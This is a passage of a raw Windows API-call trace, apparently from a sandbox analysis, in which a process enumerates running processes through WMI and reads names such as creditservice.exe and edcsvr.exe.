pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.643] WbemDefPath:IUnknown:Release (This=0x5eca898) returned 0x3 [0225.643] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.643] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.643] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec32c8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.643] WbemDefPath:IUnknown:Release (This=0x5ec32c8) returned 0x2 [0225.643] WbemDefPath:IUnknown:Release (This=0x5ec32c8) returned 0x1 [0225.643] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.643] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.643] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec32c8, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5ec32c8) returned 0x0 [0225.643] WbemDefPath:IUnknown:AddRef (This=0x5ec32c8) returned 0x3 [0225.643] WbemDefPath:IUnknown:Release (This=0x5ec32c8) returned 0x2 [0225.643] WbemDefPath:IWbemPath:SetText (This=0x5ec32c8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2796\"") returned 0x0 [0225.643] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.643] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.643] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.643] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.644] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.644] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.644] IWbemClassObject:Get (in: This=0x5ecd900, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26fdac4*=0, plFlavor=0x26fdac8*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="creditservice.exe", varVal2=0x0), pType=0x26fdac4*=8, plFlavor=0x26fdac8*=0) returned 0x0 [0225.644] SysStringByteLen (bstr="creditservice.exe") returned 0x22 [0225.644] SysStringByteLen (bstr="creditservice.exe") returned 0x22 [0225.644] IWbemClassObject:Get (in: This=0x5ecd900, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26fdac4*=8, plFlavor=0x26fdac8*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="creditservice.exe", varVal2=0x0), pType=0x26fdac4*=8, plFlavor=0x26fdac8*=0) returned 0x0 [0225.644] SysStringByteLen (bstr="creditservice.exe") returned 0x22 [0225.644] SysStringByteLen (bstr="creditservice.exe") returned 0x22 [0225.644] CoTaskMemAlloc (cb=0x4) returned 0x5eca8c8 [0225.644] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5eca8c8, puReturned=0x26dde18 | out: apObjects=0x5eca8c8*=0x5ecda98, puReturned=0x26dde18*=0x1) returned 0x0 [0225.646] IUnknown:QueryInterface (in: This=0x5ecda98, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5ecda98) returned 0x0 [0225.646] IUnknown:QueryInterface (in: This=0x5ecda98, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.646] IUnknown:QueryInterface (in: This=0x5ecda98, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.646] IUnknown:AddRef (This=0x5ecda98) returned 0x3 [0225.646] IUnknown:QueryInterface (in: This=0x5ecda98, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.646] IUnknown:QueryInterface (in: This=0x5ecda98, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.647] IUnknown:QueryInterface (in: This=0x5ecda98, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5ecda9c) returned 0x0 [0225.647] IMarshal:GetUnmarshalClass (in: This=0x5ecda9c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.647] IUnknown:Release (This=0x5ecda9c) returned 0x3 [0225.647] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.647] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.647] IUnknown:QueryInterface (in: This=0x5ecda98, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.647] IUnknown:Release (This=0x5ecda98) returned 0x2 [0225.647] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.647] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.647] IUnknown:QueryInterface (in: This=0x5ecda98, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5ecda98) returned 0x0 [0225.647] IUnknown:AddRef (This=0x5ecda98) returned 0x4 [0225.647] IUnknown:Release (This=0x5ecda98) returned 0x3 [0225.647] IUnknown:Release (This=0x5ecda98) returned 0x2 [0225.647] CoTaskMemFree (pv=0x5eca8c8) [0225.648] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.648] IUnknown:AddRef (This=0x5ecda98) returned 0x3 [0225.648] IWbemClassObject:Get (in: This=0x5ecda98, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.648] IWbemClassObject:Get (in: This=0x5ecda98, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2804\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.648] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2804\"") returned 0x66 [0225.648] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2804\"") returned 0x66 [0225.648] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.648] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.649] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.649] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.649] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5eca8c8) returned 0x0 [0225.650] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eca8c8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.650] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5eca8c8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5ed0a08) returned 0x0 [0225.650] WbemDefPath:IUnknown:Release (This=0x5eca8c8) returned 0x0 [0225.650] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0a08, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5ed0a08) returned 0x0 [0225.650] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0a08, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.650] WbemDefPath:IUnknown:AddRef (This=0x5ed0a08) returned 0x3 [0225.650] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0a08, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.651] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0a08, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.651] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0a08, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5eca8d8) returned 0x0 [0225.651] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5eca8d8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.651] WbemDefPath:IUnknown:Release (This=0x5eca8d8) returned 0x3 [0225.651] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.651] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.651] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0a08, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.651] WbemDefPath:IUnknown:Release (This=0x5ed0a08) returned 0x2 [0225.651] WbemDefPath:IUnknown:Release (This=0x5ed0a08) returned 0x1 [0225.651] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.651] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.651] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0a08, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5ed0a08) returned 0x0 [0225.651] WbemDefPath:IUnknown:AddRef (This=0x5ed0a08) returned 0x3 [0225.651] WbemDefPath:IUnknown:Release (This=0x5ed0a08) returned 0x2 [0225.651] WbemDefPath:IWbemPath:SetText (This=0x5ed0a08, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2804\"") returned 0x0 [0225.651] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.651] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.652] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.652] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.652] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.652] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.652] IWbemClassObject:Get (in: This=0x5ecda98, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26fe348*=0, plFlavor=0x26fe34c*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="edcsvr.exe", varVal2=0x0), pType=0x26fe348*=8, plFlavor=0x26fe34c*=0) returned 0x0 [0225.652] SysStringByteLen (bstr="edcsvr.exe") returned 0x14 [0225.652] SysStringByteLen (bstr="edcsvr.exe") returned 0x14 [0225.652] IWbemClassObject:Get (in: This=0x5ecda98, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26fe348*=8, plFlavor=0x26fe34c*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="edcsvr.exe", varVal2=0x0), pType=0x26fe348*=8, plFlavor=0x26fe34c*=0) returned 0x0 [0225.652] SysStringByteLen (bstr="edcsvr.exe") returned 0x14 [0225.652] SysStringByteLen (bstr="edcsvr.exe") returned 0x14 [0225.652] CoTaskMemAlloc (cb=0x4) returned 0x5eca908 [0225.652] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5eca908, puReturned=0x26dde18 | out: apObjects=0x5eca908*=0x5ecdc30, puReturned=0x26dde18*=0x1) returned 0x0 [0225.653] IUnknown:QueryInterface (in: This=0x5ecdc30, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5ecdc30) returned 0x0 [0225.653] IUnknown:QueryInterface (in: This=0x5ecdc30, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.654] IUnknown:QueryInterface (in: This=0x5ecdc30, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.654] IUnknown:AddRef (This=0x5ecdc30) returned 0x3 [0225.654] IUnknown:QueryInterface (in: This=0x5ecdc30, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.654] IUnknown:QueryInterface (in: This=0x5ecdc30, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.654] IUnknown:QueryInterface (in: This=0x5ecdc30, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5ecdc34) returned 0x0 [0225.654] IMarshal:GetUnmarshalClass (in: This=0x5ecdc34, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.654] IUnknown:Release (This=0x5ecdc34) returned 0x3 [0225.654] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.654] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.654] IUnknown:QueryInterface (in: This=0x5ecdc30, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.654] IUnknown:Release (This=0x5ecdc30) returned 0x2 [0225.654] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.654] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.654] IUnknown:QueryInterface (in: This=0x5ecdc30, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5ecdc30) returned 0x0 [0225.654] IUnknown:AddRef (This=0x5ecdc30) returned 0x4 [0225.655] IUnknown:Release (This=0x5ecdc30) returned 0x3 [0225.655] IUnknown:Release (This=0x5ecdc30) returned 0x2 [0225.655] CoTaskMemFree (pv=0x5eca908) [0225.655] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.655] IUnknown:AddRef (This=0x5ecdc30) returned 0x3 [0225.655] IWbemClassObject:Get (in: This=0x5ecdc30, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.655] IWbemClassObject:Get (in: This=0x5ecdc30, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2812\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.655] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2812\"") returned 0x66 [0225.655] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2812\"") returned 0x66 [0225.656] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.656] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.656] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.656] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.657] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5eca908) returned 0x0 [0225.657] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eca908, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.657] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5eca908, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5ed0ae8) returned 0x0 [0225.657] WbemDefPath:IUnknown:Release (This=0x5eca908) returned 0x0 [0225.657] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0ae8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5ed0ae8) returned 0x0 [0225.658] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0ae8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.658] WbemDefPath:IUnknown:AddRef (This=0x5ed0ae8) returned 